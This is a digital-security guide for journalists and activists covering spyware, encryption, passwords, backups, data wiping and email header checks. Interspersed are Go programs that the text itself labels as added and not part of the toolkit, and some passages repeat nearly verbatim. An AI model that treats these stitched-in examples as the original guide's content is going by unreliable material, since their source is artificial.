Check for available decryption tools - In case you are a target of ransomware, the general advice is not to pay, as there is no guarantee you will indeed receive the correct decryption key. Payments also encourage further cybercrime attempts. You can try to find a decryption tool based on the type of ransomware. For example, No More Ransom is an initiative that provides citizens with free decryption tools for many forms of ransomware. Most ransomware targets are large companies, but individuals should be aware of the dangers and consequences too.

Restore backup - Depending on which data you cannot access, you should try to restore your files from a backup. Make sure your files are backed up regularly and that you can access the backups in case they are kept on some cloud-based service (e.g. Proton Drive, Dropbox, Tresorit).

Restore system - In case the operating system of your device suffered serious damage affecting its performance, it is advisable to restore it to the last configuration in which it was fully functional. Windows has the System Restore option and MacOS has Time Machine, while for Linux systems there are many backup and restore tools available.

I may be targeted with spyware

Journalists, activists, human rights defenders, and opposition politicians have found their mobile phones targeted by advanced spyware tools such as Pegasus or Predator. These tools are highly intrusive as they practically provide full access to the device and are difficult to discover without applying digital forensics techniques on the phone.

Look out for threat notifications - Apple sends threat notifications, i.e. messages notifying the user that their device might be targeted with mercenary spyware attacks. In case you receive such a message, the advice is to take it seriously and contact organisations such as SHARE Foundation, Amnesty International, Access Now, or Citizen Lab.

Google does not send threat notifications for Android devices as Apple does for their products. However, Google might similarly notify you in case there is suspicion that your account has been targeted by government-backed attackers.

Turn on Lockdown Mode on Apple devices - To stop advanced threats, such as Pegasus or Predator spyware, from compromising your Apple devices, enable Lockdown Mode. This disables certain features on your device (iPhone, iPad, Mac) and it somewhat affects the user experience, but is known to stop sophisticated cyberattacks.

Update your phone - Make sure that all the apps on your phone are regularly updated and that you also have the latest version of iOS or Android. Operating system updates also contain security patches, which are critical for preventing spyware from infecting your device.

Be cautious of suspicious messages or calls - These spyware tools are usually delivered through messages or calls from unknown foreign numbers, so try to remember if you received a very suspicious message at some point.

My chats / calls might be intercepted

In case you suspect someone is intercepting your calls or messages, there are steps you can take to make sure that your conversations or chats are not compromised:

Use encrypted calls and chats - End-to-end encryption (E2EE) keeps messages and calls encrypted and private from everyone, including the provider of the messaging service. The sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. It is like sending a scrambled letter through a postal service: nobody can read the letter except you and the person you sent it to.

One of the benefits of E2EE chat apps is that you can easily connect to your contacts without additional steps like public key exchange for PGP emails. The following apps offer end-to-end encrypted chats by default:

Signal is a free and open-source application developed by an independent non-profit organisation, which means it does not contain ads or trackers within the app. Some of its useful features are disappearing messages, availability on both mobile and desktop, and support for proxy access (if Signal is blocked in a country).

Element is a free and open-source chat solution, built on Matrix, an open network for secure, decentralised communication. Some of the perks of Element are that it can be self-hosted, it's good for organisational implementation because it is easily scalable, and there are free and paid versions.

WhatsApp is free to use but a proprietary app, which is available on mobile, desktop, and web alike. WhatsApp is owned by Meta, Facebook’s parent company, which doesn't provide a sense of privacy because its business model is based on selling user data. It has some useful features like disappearing messages.

My email might be intercepted

In case you suspect someone is intercepting your email correspondence, there are steps you can take to make sure that your emails are not compromised:

Use PGP to encrypt emails - Emails can be encrypted using PGP (Pretty Good Privacy), which is based on public key cryptography. You need to generate a key pair - a public key that you share with others and a private key that you keep secret - to exchange encrypted emails with correspondents.

If you use an email provider like Gmail or Outlook, you can encrypt your communication using Thunderbird, an open-source email client with built-in OpenPGP capabilities, or by using the Mailvelope browser extension which works with popular webmail services. By using these tools you can easily generate a key pair for encrypting your email, or import existing encryption keys.

Switch to encrypted-by-default email providers - There are email providers, such as ProtonMail or Tuta, which encrypt messages automatically when they are sent between their users and also provide ways to send encrypted emails to those using other providers. Please refer to these Proton and Tuta guides on how to send password protected emails to users on other email providers.

Change your email account password and turn on multi-factor authentication - If you suspect that someone has accessed your email account and has been reading your correspondence, change your password immediately and set up multi-factor authentication (MFA). MFA adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone, in addition to your password. Please refer to this guide for details on how to set up MFA on multiple email providers. 2FA Directory has more information on which tools support MFA and links to guides.

Email encryption

Similar to hard drives and removable disks, communication channels can also be encrypted by protecting data with a complex cipher so that communication can only be accessed (decrypted) with a password or key. Of course, for journalists and human rights activists encryption is a key component of ensuring secure communication with confidential sources. This can be done in a variety of ways.

In messaging services, we know that third parties store the data, such as messages and calls, and that the data is only encrypted in transit, which can be a problem if privacy is needed at all points of communication. End-to-end encryption (E2EE) keeps messages encrypted and private from everyone, including the provider of the messaging service. The sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. Basically, it is like sending a scrambled letter through a postal service: nobody can read the letter except you and the person you sent it to.

Emails can be encrypted using PGP (Pretty Good Privacy), which is based on public key cryptography. You need to generate a key pair - a public key that you share with others and a private key that you keep secret - in order to exchange encrypted emails with correspondents.

If you use an email provider like Gmail or Outlook, you can encrypt your communication using Thunderbird, an open-source email client with built-in OpenPGP capabilities, or by using the Mailvelope browser extension which works with popular webmail services.

However, there are email providers, such as ProtonMail or Tuta, which encrypt your messages automatically when they are sent between their users and also provide ways to send encrypted emails to those using other providers. Please refer to these Proton and Tuta guides on how to send password protected emails to users on other email providers.

Chat encryption

In messaging services, we know that third parties store the data, such as messages and calls, and that the data is only encrypted in transit, which can be a problem if privacy is needed at all points of communication. End-to-end encryption (E2EE) keeps messages encrypted and private from everyone, including the provider of the messaging service. The sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. Basically, it is like sending a scrambled letter through a postal service: nobody can read the letter except you and the person you sent it to.

One of the benefits of E2EE chat is that you can easily connect to your contacts without additional steps like public key exchange for PGP emails. The following apps offer end-to-end encrypted chats by default:

Signal is a free and open-source application developed by an independent non-profit organisation, which means it does not contain ads or trackers within the app. Some of its useful features are disappearing messages, availability on both mobile and desktop, and support for proxy access (if Signal is blocked in a country).

Element is a free and open-source chat solution, built on Matrix, an open network for secure, decentralised communication. Some of the perks of Element are that it can be self-hosted, it's good for organisational implementation because it is easily scalable, and there are free and paid versions.

WhatsApp is free to use but a proprietary app, which is available on mobile, desktop, and web alike. WhatsApp is owned by Meta, Facebook’s parent company, which doesn't provide a sense of privacy because its business model is based on selling user data. It has some useful features like disappearing messages.

Making a strong password

When making a password, you should make sure that it is unique (used for only one account or device), long, and complex.

Using the same password for multiple resources is a risk - if one of your accounts is compromised, others using the same password might be as well.

Having a long password - 10+ or even 20+ characters, the longer the better - makes it harder to crack or guess. The use of different types of characters and symbols, such as numbers, small and capital letters, and special characters (!, ~, *) is strongly encouraged.

Avoid using online password generators and “how strong is my password” tools - you can’t know who is behind them and where your passwords might end up.
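The three criteria above (unique, long, complex) and the advice to avoid online generators, as an added Go example that is not part of this toolkit: it generates passwords locally with crypto/rand and checks a candidate against the criteria and against a constructed map of passwords already in use.

```go
package main

import (
	"crypto/rand"
	"fmt"
	"math/big"
	"strings"
	"unicode"
)

// Character classes the page recommends mixing: lower, upper, digits, symbols.
const (
	lower   = "abcdefghijklmnopqrstuvwxyz"
	upper   = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
	digits  = "0123456789"
	symbols = "!~*#$%&()+-=?@^_"
)

// randomChar picks one byte of alphabet using the OS cryptographic RNG.
func randomChar(alphabet string) (byte, error) {
	n, err := rand.Int(rand.Reader, big.NewInt(int64(len(alphabet))))
	if err != nil {
		return 0, err
	}
	return alphabet[n.Int64()], nil
}

// GeneratePassword builds a random password of the requested length entirely
// on the local machine (nothing is sent anywhere), guaranteeing at least one
// character from each class and then shuffling so the guaranteed characters
// do not always sit at the front.
func GeneratePassword(length int) (string, error) {
	classes := []string{lower, upper, digits, symbols}
	if length < len(classes) {
		return "", fmt.Errorf("length %d too short to include all four classes", length)
	}
	all := strings.Join(classes, "")
	buf := make([]byte, 0, length)
	for _, c := range classes {
		ch, err := randomChar(c)
		if err != nil {
			return "", err
		}
		buf = append(buf, ch)
	}
	for len(buf) < length {
		ch, err := randomChar(all)
		if err != nil {
			return "", err
		}
		buf = append(buf, ch)
	}
	for i := len(buf) - 1; i > 0; i-- { // Fisher-Yates shuffle
		j, err := rand.Int(rand.Reader, big.NewInt(int64(i+1)))
		if err != nil {
			return "", err
		}
		buf[i], buf[j.Int64()] = buf[j.Int64()], buf[i]
	}
	return string(buf), nil
}

// CheckPassword applies the page's three criteria offline. used maps account
// names to passwords already in use, so reuse across accounts is flagged.
// It returns the failed criteria; an empty slice means the password passes.
func CheckPassword(pw string, used map[string]string) []string {
	var problems []string
	if len(pw) < 10 {
		problems = append(problems, "shorter than 10 characters")
	}
	var hasLower, hasUpper, hasDigit, hasSymbol bool
	for _, r := range pw {
		switch {
		case unicode.IsLower(r):
			hasLower = true
		case unicode.IsUpper(r):
			hasUpper = true
		case unicode.IsDigit(r):
			hasDigit = true
		default:
			hasSymbol = true
		}
	}
	if !(hasLower && hasUpper && hasDigit && hasSymbol) {
		problems = append(problems, "missing a character class (lower, upper, digit, symbol)")
	}
	for account, other := range used {
		if other == pw {
			problems = append(problems, "already used for account "+account)
			break
		}
	}
	return problems
}

func main() {
	used := map[string]string{"email": "Summer2024!"} // constructed sample
	pw, _ := GeneratePassword(20)
	fmt.Println(pw, CheckPassword(pw, used))
	fmt.Println(CheckPassword("Summer2024!", used))
}
```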

It is also highly recommended to set up multi-factor authentication on your accounts if the online service or platform has that option. This creates an additional layer of protection, as an additional step is required to log in, usually a one-time code received via SMS or an app such as Aegis Authenticator. iPhones have a built-in option to generate MFA codes.

However, multi-factor authentication (MFA) is not a perfect solution - people are still susceptible to social engineering attacks, such as phishing scams, and can be persuaded or fatigued to disclose the second authentication factor, a one-time code for example. This is why it is important to consider a phishing-resistant solution for MFA, such as the use of physical hardware keys.

Multi-factor authentication by default is unfortunately still not an industry standard - there are services that don’t offer it, and for those that do, users still have to navigate through complex security settings in their accounts in order to set it up.

Although any kind of MFA is better than having none, some forms are safer than others. For example, receiving codes via SMS is less secure due to security flaws in mobile networks and so-called “SIM swapping”, i.e. when an attacker gains access to a person’s phone number by tricking their mobile provider’s staff.

However, it should be noted that MFA is not a substitute for regular security training and awareness of threats such as ransomware. It is very important to build a positive, proactive security culture within your organisation with motivating and engaging training - you can improve digital security on both personal and organisational levels if you focus on all three domains of cybersecurity: people, processes, and technology.

Password management

With the number of accounts an average internet user has today, it has become impossible to memorise all passwords and have them be unique, long, and complex at the same time.

That is why you should use applications called password managers, which securely store your login credentials and protect them with a master password. That way, you only need to remember your master password and you can copy/paste your other credentials directly from the app. Password management software usually has the option to automatically generate a long and complex password, made of randomised characters and symbols.

Applications commonly used for password management are KeePass, KeePassXC, and Bitwarden. KeePass provides a tutorial for the first steps after you install the application and KeePassXC also offers a detailed instruction page for new users. When it comes to Bitwarden, before you start using it you need to register for an account and log in to the app type of your choice, e.g. browser add-on, desktop app, or mobile app.

Storing login credentials in browsers should be avoided, together with online password managers which are not open source and end-to-end encrypted.

What is encryption

Encryption is a process of converting information or data into a code to prevent unauthorised access. It involves the use of algorithms (mathematical procedures or formulas) to transform plaintext, which is the original and readable data, into ciphertext, which is the encrypted and unreadable form. The encryption process typically requires a key, which is a specific piece of information used in conjunction with the algorithm to perform the encryption and, later, the decryption.

The primary purpose of encryption is to ensure the confidentiality and security of sensitive information during storage or transmission. Encryption is widely used in various applications, including secure communication over the internet, safeguarding personal information, protecting financial transactions, and securing sensitive data on storage devices. There are different types of encryption algorithms, and the strength of encryption often depends on factors such as the length of the encryption key and the complexity of the algorithm used.

Symmetric encryption involves the use of one key for both encryption and decryption. The plaintext is fed into an encryption algorithm along with a key. The algorithm uses the key to turn the plaintext into ciphertext, thus encrypting the original sensitive data. This works well for data that is being stored and needs to be decrypted at a later date. The use of just one key for both encryption and decryption reveals an issue, as the compromise of the key would lead to a compromise of any data the key has encrypted. This also does not work for data-in-motion, which is where asymmetric encryption comes in.

Asymmetric encryption works with a pair of keys. The beginning of asymmetric encryption involves the creation of a pair of keys, one of which is a public key, and the other is a private key. The public key is accessible by anyone, while the private key must be kept a secret from everyone but the creator of the key. This is because encryption occurs with the public key, while decryption occurs with the private key. The recipient of the sensitive data will provide the sender with their public key, which will be used to encrypt the data. This ensures that only the recipient can decrypt the data, with their private key.

Finally, it is important to explain end-to-end encryption, which offers an additional layer of protection. End-to-end encryption (E2EE) keeps information encrypted and private from everyone, including the provider of the online service. For example, on end-to-end encrypted messaging services, the sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. Basically, it's like when you send a scrambled letter through a postal service, nobody can read your letter except you and the person to whom you sent it.
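The symmetric and asymmetric schemes explained above, and the way PGP-style email encryption (the key pair described under “My email might be intercepted”) combines them, as an added Go example that is not part of this toolkit. It uses the standard library's AES-GCM and RSA-OAEP in a simplified hybrid scheme, not OpenPGP itself; the sample message and key sizes are constructed for the example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// SymmetricEncrypt: one key both encrypts and decrypts (AES-256-GCM). The
// random nonce is prepended to the ciphertext; GCM also authenticates the
// data, so any tampering is detected on decryption.
func SymmetricEncrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// SymmetricDecrypt reverses SymmetricEncrypt with the same single key.
func SymmetricDecrypt(key, data []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(data) < gcm.NonceSize() {
		return nil, errors.New("ciphertext too short")
	}
	nonce, ct := data[:gcm.NonceSize()], data[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, nil)
}

// Message is what the sender hands over: the data key wrapped with the
// recipient's public key, plus the body encrypted under that data key.
type Message struct {
	WrappedKey []byte
	Body       []byte
}

// Encrypt follows the hybrid pattern PGP uses: a fresh random symmetric key
// protects the (possibly large) body, and only that small key is encrypted
// with the recipient's public key (RSA-OAEP), which anyone may hold.
func Encrypt(recipient *rsa.PublicKey, plaintext []byte) (*Message, error) {
	dataKey := make([]byte, 32)
	if _, err := rand.Read(dataKey); err != nil {
		return nil, err
	}
	body, err := SymmetricEncrypt(dataKey, plaintext)
	if err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, recipient, dataKey, nil)
	if err != nil {
		return nil, err
	}
	return &Message{WrappedKey: wrapped, Body: body}, nil
}

// Decrypt only succeeds with the matching private key, which never left the
// recipient; anyone else, including the mail provider, gets an error.
func Decrypt(priv *rsa.PrivateKey, msg *Message) ([]byte, error) {
	dataKey, err := rsa.DecryptOAEP(sha256.New(), nil, priv, msg.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	return SymmetricDecrypt(dataKey, msg.Body)
}

func main() {
	// The recipient generates a key pair and shares only the public half.
	recipient, _ := rsa.GenerateKey(rand.Reader, 2048)
	msg, _ := Encrypt(&recipient.PublicKey, []byte("meeting at 10, source confirmed"))
	out, _ := Decrypt(recipient, msg)
	fmt.Println(string(out))
	other, _ := rsa.GenerateKey(rand.Reader, 2048) // e.g. the provider's own key
	_, err := Decrypt(other, msg)
	fmt.Println("provider can read it:", err == nil)
}
```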

Disk encryption

Encryption is the process of protecting data with a complex cipher, scrambling it so that it can only be accessed (decrypted) with a password or key, sometimes requiring an additional authentication factor, e.g. a digital certificate. Encrypting hard drives and removable devices, such as USB drives, is especially recommended for people working with confidential information, primarily journalists and human rights activists, but also anyone generally working with personal data.

VeraCrypt is a multi-platform (Windows, Linux, MacOS X) free and open-source disk encryption software with advanced capabilities. It can be used to encrypt only specific files, whole hard disk partitions, removable drives, as well as a partition or drive where Windows is installed (pre-boot authentication). You can find more information on how VeraCrypt works in this tutorial.

FileVault is a MacOS utility that enables you to encrypt files on your device with your login password for an extra layer of security. In case you forget your login password, you can unlock your disk by using either your iCloud account password or a recovery key which is generated automatically when you select this option. You can find more information on how FileVault works in this tutorial.

Cryptomator enables you to encrypt your cloud storage files for services such as Dropbox or Google Drive. Files are encrypted within a secure vault which is then stored with cloud service providers, which cannot access the data. Cryptomator is open source and available for Windows, Linux, MacOS X, and mobile platforms (iOS, Android).

Data backup

Backing up does not affect the level of security of the system itself, but backup is crucial when, after a security crisis, there is a need to recover lost data. Sometimes, based on a backup, it is possible to determine the cause of the system crash by reconstructing security vulnerabilities or errors in the system. It is recommended to use an open-source backup system, such as UrBackup. When choosing, care should be taken that the backup system provides the ability to quickly and accurately restore data and that it is optimal, i.e. does not overload the server or storage resources.

A key recommendation to follow when it comes to backing up your data is the “3-2-1” rule: keep at least 3 copies of your data, make sure two copies are stored on separate devices or storage units and that one copy is stored off-site from the initial two copies, for example on a remote server.

Another important matter to take into consideration with backups is that although cloud storage providers (Proton Drive, Dropbox, Tresorit, etc.) are a common and safe solution to safely store data, they can be vulnerable to social engineering and similar attacks and do not guarantee that data will not be lost due to various reasons (e.g. Google Drive for desktop users reported losing months of data in late 2023). Taking this into account, making offline backups on an external hard drive or another computer is also encouraged as an additional precaution.
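The “3-2-1” rule above as an added Go check that is not part of this toolkit; it goes one step further than the rule and compares each copy's SHA-256 checksum, since a copy that differs from the original is not a usable backup. The Copy type, its device labels and the three sample files are constructed for the example.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"os"
)

// Copy describes one stored copy of a backup set, as the operator knows it.
type Copy struct {
	Path    string // file (or mounted share) holding this copy
	Device  string // storage unit, e.g. "laptop-ssd", "usb-1", "remote-server"
	Offsite bool   // true if kept away from the location of the primary copies
}

// sha256File returns the hex digest of a file's contents.
func sha256File(path string) (string, error) {
	f, err := os.Open(path)
	if err != nil {
		return "", err
	}
	defer f.Close()
	h := sha256.New()
	if _, err := io.Copy(h, f); err != nil {
		return "", err
	}
	return hex.EncodeToString(h.Sum(nil)), nil
}

// Check321 reports every way a set of copies falls short of the 3-2-1 rule
// (at least 3 copies, on at least 2 devices, at least 1 off-site) and then
// verifies that every copy's checksum matches the first one.
func Check321(copies []Copy) []string {
	var problems []string
	if len(copies) < 3 {
		problems = append(problems, fmt.Sprintf("only %d copies, need at least 3", len(copies)))
	}
	devices := map[string]bool{}
	offsite := 0
	for _, c := range copies {
		devices[c.Device] = true
		if c.Offsite {
			offsite++
		}
	}
	if len(devices) < 2 {
		problems = append(problems, "all copies are on the same device, need at least 2")
	}
	if offsite < 1 {
		problems = append(problems, "no off-site copy")
	}
	reference := ""
	for i, c := range copies {
		sum, err := sha256File(c.Path)
		if err != nil {
			problems = append(problems, fmt.Sprintf("copy %d (%s) unreadable: %v", i, c.Device, err))
			continue
		}
		if reference == "" {
			reference = sum
		} else if sum != reference {
			problems = append(problems, fmt.Sprintf("copy %d (%s) differs from copy 0", i, c.Device))
		}
	}
	return problems
}

func main() {
	// Constructed sample: three identical files standing in for three copies.
	dir, _ := os.MkdirTemp("", "backup321")
	defer os.RemoveAll(dir)
	paths := []string{dir + "/a", dir + "/b", dir + "/c"}
	for _, p := range paths {
		os.WriteFile(p, []byte("archive-2024"), 0o600)
	}
	copies := []Copy{
		{paths[0], "laptop-ssd", false},
		{paths[1], "usb-1", false},
		{paths[2], "remote-server", true},
	}
	fmt.Println("problems:", Check321(copies))
}
```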

Remote working

Access to applications and data that are physically located in the system (organisation, editorial office) is possible, with appropriate permissions, from any computer in the world. This significantly facilitates work, shortens the time required for data processing, and enables participation in the fieldwork process.

From a security point of view, teleworking has serious drawbacks. Establishing a connection between the network or server in the system and the external computer opens the possibility for MitM (Man in the Middle) attacks. MitM is a type of technical attack in which the client and server are not necessarily at risk, but the attacker uses connection flaws to access their communication and commit data theft.

A secure way to work remotely is to connect via VPN (Virtual Private Network). A VPN is a service that creates a separate tunnel between two computers on the public network, which is specially encrypted for protection. One of the best VPN implementations at the organisational level is OpenVPN.

Organisations can opt to use solutions such as Nextcloud or CryptPad in order to have access to collaborative productivity tools (documents, spreadsheets, etc.) as well as secure file storage and sharing.

Permanent data deletion

Conventional deletion of data from a device is not an effective solution for permanent deletion, because there are ways to recover deleted data with the help of special software. The solution is software that uses complex algorithms to decompose data into a digital mash that can no longer be returned to its original form. Eraser is a free Windows application that can completely remove data from hard drives by overwriting it several times with carefully selected patterns.

As for optical disks (CDs, DVDs), the most elegant way to permanently destroy them is to use a special shredder that can destroy disks in addition to paper. Methods for physically destroying hard drives that can be found online, where the drive is acidified or burned, are extremely dangerous. Hard drives contain various types of harmful chemicals, which can cause toxic and flammable fumes.

If old equipment is ready for sale or a hard drive is destined for disposal, it will require deep cleaning, even if it is broken. The software that does this very efficiently is Darik’s Boot and Nuke. Good practice suggests that when disposing of old equipment - after special software has performed deep cleaning of the disks - the equipment is disassembled to destroy the ports and break the pins on the connectors.
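Multi-pass overwriting of the kind Eraser performs, as an added Go example that is not part of this toolkit or of Eraser: the pattern list, the number of random passes and the sample file are constructed for the example, and the comment records where in-place overwriting does not reach.

```go
package main

import (
	"crypto/rand"
	"fmt"
	"os"
)

// WipeFile overwrites the file at path in place with four fixed patterns
// (0x00, 0xFF, 0x55, 0xAA) followed by randomPasses passes of random bytes,
// flushing to disk after each pass, then truncates and removes the file.
// It returns the number of overwrite passes completed.
//
// Caveat: this only reaches the blocks the filesystem currently maps to the
// file. SSD wear levelling, copy-on-write or journaling filesystems, cloud
// sync folders and earlier backups can all keep untouched copies, which is
// why full-disk encryption is the more reliable baseline for sensitive data.
func WipeFile(path string, randomPasses int) (int, error) {
	f, err := os.OpenFile(path, os.O_WRONLY, 0)
	if err != nil {
		return 0, err
	}
	defer f.Close()
	info, err := f.Stat()
	if err != nil {
		return 0, err
	}
	size := info.Size()
	buf := make([]byte, 64*1024)

	// writePass covers the whole file with whatever fill puts into the buffer.
	writePass := func(fill func([]byte) error) error {
		if _, err := f.Seek(0, 0); err != nil {
			return err
		}
		for remaining := size; remaining > 0; {
			n := int64(len(buf))
			if remaining < n {
				n = remaining
			}
			if err := fill(buf[:n]); err != nil {
				return err
			}
			if _, err := f.Write(buf[:n]); err != nil {
				return err
			}
			remaining -= n
		}
		return f.Sync()
	}

	passes := 0
	for _, p := range []byte{0x00, 0xFF, 0x55, 0xAA} {
		pattern := p
		err := writePass(func(b []byte) error {
			for i := range b {
				b[i] = pattern
			}
			return nil
		})
		if err != nil {
			return passes, err
		}
		passes++
	}
	for i := 0; i < randomPasses; i++ {
		err := writePass(func(b []byte) error {
			_, err := rand.Read(b)
			return err
		})
		if err != nil {
			return passes, err
		}
		passes++
	}
	if err := f.Truncate(0); err != nil {
		return passes, err
	}
	if err := f.Close(); err != nil {
		return passes, err
	}
	return passes, os.Remove(path)
}

func main() {
	// Constructed sample file standing in for a document to destroy.
	path := os.TempDir() + "/draft-to-destroy.txt"
	os.WriteFile(path, []byte("confidential source notes"), 0o600)
	passes, err := WipeFile(path, 2)
	fmt.Println("passes:", passes, "error:", err)
}
```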

Potential mobile threats

The security of mobile devices is becoming crucial with the rise of cyber threats directed towards smartphones and tablets. Risks include unauthorised access to sensitive data, financial losses, and other potential damages. Mobile devices, now exposed to numerous threats, often store important information such as emails, banking data, and private photos. To minimise potential harm, it is crucial to identify vulnerabilities and manage devices responsibly.

Potential digital threats that mobile devices need protection from include malicious applications and websites, often disguised as legitimate ones. Excessive app permissions granted to downloaded applications can compromise the privacy of our data. Phishing attacks are also prevalent through SMS messages and chat applications, as users often check and open messages in real time and may be less cautious. Data leaks often result from free applications whose business model involves selling user data to other companies. Mobile devices are not exempt from attacks by malicious software, and spyware attacks on individuals in the civic sector are common. Caution is also advised when accessing a Wi-Fi network, as it may be fake or eavesdropped on by malicious actors.

How to recognise a fake (malicious) mobile application

If an application has few reviews or very few downloads, it may simply be relatively new. On the other hand, it could be a fake application designed to harm anyone who installs it.

  • Search the application and company on the internet: Most legitimate developers will have a website displaying all the features of the application and any other applications they have developed.
  • Read available app reviews: If they seem short and uninformative, it is not safe to download that application. Additionally, there may be reviews from users who have been deceived by the application.
  • Pay attention to details: Does the application look professional? Good design indicates a good application. Pay attention to inconsistencies in fonts, typing errors, and asymmetric placement of logos and images.
  • Many fake applications are copies of existing popular applications: It is useful to look at who is behind the application and whether that developer matches the one behind the original. Pay attention to the number of reviews - extremely popular applications will have hundreds, if not thousands, of user reviews.

Securing your mobile phone

Below you can find some advice on how to secure your mobile phone:

  • Password protection: Set up strong passwords for device security.
  • Mobile device encryption: Encrypt your device to safeguard sensitive data.
  • Regular data backup: Routinely backup your data to prevent loss in case of security incidents.
  • Be cautious of apps: Only download apps from reputable sources, and review permissions before installation and again before granting apps these permissions.
  • Regular app and OS updates: Keep your apps and operating system up to date to patch security vulnerabilities.
  • Activate the Find My Device feature: Enable the “Find My Device” feature for both Android and iPhone devices. However, be aware that this measure carries security risks as it can potentially be exploited for tracking purposes. It is advisable to carefully assess whether setting this up would be beneficial.
  • Logout from organisational accounts: Preferably log out after using organisational accounts.
  • Use a password manager: Employ a password manager for secure credential management.
  • Secure important files/folders: Protect crucial files and folders with passwords for added privacy.
  • VPN usage: Consider using a Virtual Private Network (VPN) for enhanced online security.
  • Log out after payments: Always log out from websites or apps after making payments.
  • Disable Bluetooth when unused: Turn off Bluetooth when it is not in use to minimise potential vulnerabilities.
  • Install a reliable antivirus: Use a reputable antivirus application to detect and thwart potential threats.
  • Lockdown Mode: Apple offers a feature called Lockdown Mode, which disables numerous functionalities but has proven to be effective in preventing attacks by advanced spyware.

Computer security

Device access

Work has transformed many professions over the last few decades, in particular when it comes to the size and mobility of computers. People are typing away at their laptops in cafes, airports, trains, and many other places where they choose or need to work. This of course leads to increased risk when it comes to devices, as they can be stolen or accessed by unauthorised people.

The primary step to ensure only you have access to your machine is to protect it with a password or a PIN, just like you would any other account. Many new laptops now offer biometric unlocking options, e.g. fingerprint readers. Although password protection doesn't guarantee perfect security, it can deter a malicious actor from trying to access your files.

Sharing computers at work is not as common as it used to be, but in some cases, where people work in shifts for example, it can still be the case. It is therefore important to set up separate user accounts for each person using the computer and only provide authorised personnel with an administrator account on the device. An administrator account breached by a malicious actor can be very problematic not only for the device it is located on but also for other devices in the network if the attacker manages to get enough access.

Physical security

Working and reporting from the field can be very stressful, especially when it comes to high-risk events, such as protests or demonstrations, or environments such as war or disaster zones. When you find yourself in a public place, make sure not to leave your computer unlocked or unattended, as it will be an easy target for any bad actor.

In case you frequently travel or do a lot of field work which requires you to carry your work laptop with you, strongly consider encrypting its hard drive. When the disk is encrypted, the OS installed on the hard drive cannot boot without a password. macOS has FileVault, Windows has BitLocker, and VeraCrypt as a third-party application also offers a system encryption option. Finally, be very careful with your devices during events that could turn violent, such as protests, as they can be stolen, damaged, or accessed by a bad actor.

Updates

Updating your software is of critical importance to make your device safe from hacking attacks and for your device to run as smoothly as possible. Critical vulnerabilities can go unnoticed and unpatched for a long time, which makes devices a desirable target for hackers, especially if the devices hold confidential information and can be used for further attacks and other malicious activities.

Installing trusted software

In the course of work, we often find ourselves in a situation to perform a task that requires installing additional software, such as different file type converters, video downloaders, or multimedia editors. These can come in the form of browser add-ons, which may also bring vulnerabilities or be malicious themselves. In these situations, we should opt for software we can trust, i.e. which is highly rated in the community and is not publicly known for security compromises.

Tech for non-profits

Paying for licences is usually not cheap and can significantly affect the budget of a non-profit organisation. Luckily there are options to get discounted software licences or even free access to paid services:

  • TechSoup: This is an organisation that provides a wide catalogue of licensed software, from office suites to antivirus products, available to non-profit organisations for a discounted price. Registering with a regional TechSoup representative is required but it is not hard to get.
  • Proton for Business: Proton’s encrypted email solution is available at special pricing for non-profits.
  • Project Galileo: Cloudflare’s initiative for public interest actors (civil society, journalists, human rights activists...) provides them with DDoS website protection and other paid options free of charge.

Header analysis

A crucial step in the forensic analysis of email is examining the email header. It contains information about the message not directly displayed in the body, such as sender and recipient details, timestamp, and the route the message took before reaching its final destination.

In Gmail, Outlook, Yahoo and similar webmail interfaces, the headers can be viewed by selecting “Show original”, “View message source” or a similar option. This usually opens a new tab displaying the email header and text.

Though not all headers are present in every email, typical data found in the email header include:

  • From: Indicates the sender's name and address. In some cases, the address may be false or altered to conceal the sender's identity, so this field must always be analysed.
  • To: Specifies the name and address of the recipient, crucial for forensic analysis to indicate who the intended recipient is.
  • CC and BCC: These fields list others who received copies of the message. CC (Carbon Copy) refers to the public field, while BCC (Blind Carbon Copy) is a hidden field not visible to other recipients (and thus a BCC header is only present in the copy received by that recipient).
  • Date and Time: Contains the moment the message was sent, valuable in cases where timestamps serve as evidence in an investigation.
  • X-Mailer: Reveals the programs or platforms used to send the message and can provide information about the type of device used for sending.
  • Received: Lists all servers the message passed through on its journey from sender to recipient. This information can be significant for forensic analysis, aiding in the identification of sender and recipient locations, as well as identifying servers involved in sending or receiving the message; this field must always be analysed.
  • DKIM-Signature header: DomainKeys Identified Mail (DKIM) is a widely used security standard that uses asymmetric cryptography to confirm the email's legitimacy. It employs a key pair: a private key held on the sender's mail server, which signs the message, and a public key published for the sending domain, which anyone receiving the email can use to verify that signature.
  • Message-ID: This field contains a unique identifier for the message, useful in identifying the message at any stage of an investigation.

How to verify the domain in an email

Before analyzing the domain, let's first understand what comprises an email address: it consists of two parts, the username and the domain. Attackers often manipulate both the username and domain to resemble trusted sources. Among the domain manipulation methods, three are most common:

  • Exploiting expired domains.
  • Substituting the top-level domain; for instance, replacing .org with .com.
  • Introducing variations or misspellings:
    • Common misspellings: goggle.com instead of google.com.
    • Adding a dot or another character: go.gle.com instead of google.com.
    • Replacing letters with numbers: g00gle.com instead of google.com.
    • Using plurals or singulars interchangeably: googles.com instead of google.com.
    • Adding extra words: googleresults.com instead of google.com.
